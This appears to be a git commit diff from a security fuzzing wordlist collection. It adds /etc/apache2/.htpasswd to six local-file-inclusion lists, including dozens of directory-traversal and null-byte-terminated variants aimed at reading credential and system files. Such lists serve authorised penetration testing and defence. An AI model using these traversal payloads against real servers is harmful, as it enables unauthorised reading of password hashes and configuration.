Skip to content

Commit 122cc78

Browse files
feat(wordlist): Added /etc/apache2/.htpasswd to LFI fuzzing lists (PR #1223)
1 parent a23e174 commit 122cc78

6 files changed

+44
-1
lines changed

Fuzzing/LFI/LFI-Jhaddix.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -118,6 +118,7 @@ db.php
118118
../../../../../../../dev
119119
/D:\Program Files\
120120
d:\System32\Inetsrv\metabase.xml
121+
/etc/apache2/.htpasswd
121122
/etc/apache2/apache2.conf
122123
/etc/apache2/conf/httpd.conf
123124
/etc/apache2/httpd.conf

Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt

Lines changed: 39 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4009,6 +4009,44 @@ proc/self/environ%00%00
40094009
../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
40104010
../../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
40114011
../../../../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00
4012+
/etc/apache2/.htpasswd
4013+
../etc/apache2/.htpasswd
4014+
../../etc/apache2/.htpasswd
4015+
../../../etc/apache2/.htpasswd
4016+
../../../../etc/apache2/.htpasswd
4017+
../../../../../etc/apache2/.htpasswd
4018+
../../../../../../etc/apache2/.htpasswd
4019+
../../../../../../../etc/apache2/.htpasswd
4020+
../../../../../../../../etc/apache2/.htpasswd
4021+
../../../../../../../../../etc/apache2/.htpasswd
4022+
../../../../../../../../../../etc/apache2/.htpasswd
4023+
../../../../../../../../../../../etc/apache2/.htpasswd
4024+
../../../../../../../../../../../../etc/apache2/.htpasswd
4025+
../../../../../../../../../../../../../etc/apache2/.htpasswd
4026+
../../../../../../../../../../../../../../etc/apache2/.htpasswd
4027+
../../../../../../../../../../../../../../../etc/apache2/.htpasswd
4028+
../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
4029+
../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
4030+
../../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd
4031+
/etc/apache2/.htpasswd%00
4032+
../etc/apache2/.htpasswd%00
4033+
../../etc/apache2/.htpasswd%00
4034+
../../../etc/apache2/.htpasswd%00
4035+
../../../../etc/apache2/.htpasswd%00
4036+
../../../../../etc/apache2/.htpasswd%00
4037+
../../../../../../etc/apache2/.htpasswd%00
4038+
../../../../../../../etc/apache2/.htpasswd%00
4039+
../../../../../../../../etc/apache2/.htpasswd%00
4040+
../../../../../../../../../etc/apache2/.htpasswd%00
4041+
../../../../../../../../../../etc/apache2/.htpasswd%00
4042+
../../../../../../../../../../../etc/apache2/.htpasswd%00
4043+
../../../../../../../../../../../../etc/apache2/.htpasswd%00
4044+
../../../../../../../../../../../../../etc/apache2/.htpasswd%00
4045+
../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
4046+
../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
4047+
../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
4048+
../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
4049+
../../../../../../../../../../../../../../../../../../etc/apache2/.htpasswd%00
40124050
/etc/apache2/httpd.conf
40134051
../etc/apache2/httpd.conf
40144052
../../etc/apache2/httpd.conf
@@ -9510,4 +9548,4 @@ d:/boot.ini
95109548
D:/XAMPP/logs/access.log
95119549
d:/XAMPP/logs/access.log
95129550
D:\XAMPP\logs\access.log
9513-
d:\XAMPP\logs\access.log
9551+
d:\XAMPP\logs\access.log

Fuzzing/LFI/LFI-LFISuite-pathtotest.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -209,6 +209,7 @@ proc/self/environ%00
209209
/etc/httpd/conf/httpd.conf
210210
/etc/apache/conf/httpd.conf
211211
/usr/local/etc/apache/conf/httpd.conf
212+
/etc/apache2/.htpasswd
212213
/etc/apache2/httpd.conf
213214
/usr/local/apache/httpd.conf
214215
/usr/local/apache2/httpd.conf

Fuzzing/LFI/LFI-etc-files-of-all-linux-packages.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -191,6 +191,7 @@
191191
/etc/apache/ssl.prm/README
192192
/etc/apache/ssl.prm/snakeoil-ca-dsa.prm
193193
/etc/apache/ssl.prm/snakeoil-dsa.prm
194+
/etc/apache2/.htpasswd
194195
/etc/apache2/apache2.conf
195196
/etc/apache2/conf-available/gitweb.conf
196197
/etc/apache2/conf.d/apache2-doc

Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -2,6 +2,7 @@
22
/etc/shadow
33
/etc/aliases
44
/etc/anacrontab
5+
/etc/apache2/.htpasswd
56
/etc/apache2/apache2.conf
67
/etc/apache2/httpd.conf
78
/etc/at.allow

Fuzzing/LFI/[email protected]

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -26,6 +26,7 @@
2626
/etc/apache/httpd.conf
2727
/etc/apache2.conf
2828
/etc/apache2.conf
29+
/etc/apache2/.htpasswd
2930
/etc/apache2/apache2.conf
3031
/etc/apache2/apache2.conf
3132
/etc/apache2/conf/httpd.conf

0 commit comments

Comments
 (0)